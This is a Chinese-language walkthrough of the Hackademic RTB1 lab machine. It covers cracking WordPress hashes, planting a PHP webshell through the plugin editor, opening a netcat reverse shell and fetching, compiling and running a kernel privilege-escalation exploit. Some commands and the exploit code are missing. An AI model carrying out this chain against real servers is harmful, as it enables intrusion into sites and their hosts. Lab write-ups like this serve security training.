我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes
登陆wordpress的后台wp-admin
尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.
Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。
我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.
然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.
点击连接我们会看到
接下来我们尝试执行一些命令:
iduid=48(apache) gid=489(apache) groups=489(apache) (用来显示用户的id和组)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins (显示服务器上当前的路径)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(显示内核版本信息)
现在我们知道,服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com中搜索此版本的相关漏洞.
在服务器上测试了很多exp之后,我们用以下的exp来提升权限.
我们在nc shell上执行以下命令:
wget -o roro.c
(下载exp到服务器并重命名为roro.c)
注:很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.
exp roro.c代码如下:
通过以上代码我们发现该exp是C语言开发的,我们需要将它编译成elf格式的,命令如下:
gcc roro.c –ororo
接下来执行编译好的exp
./roro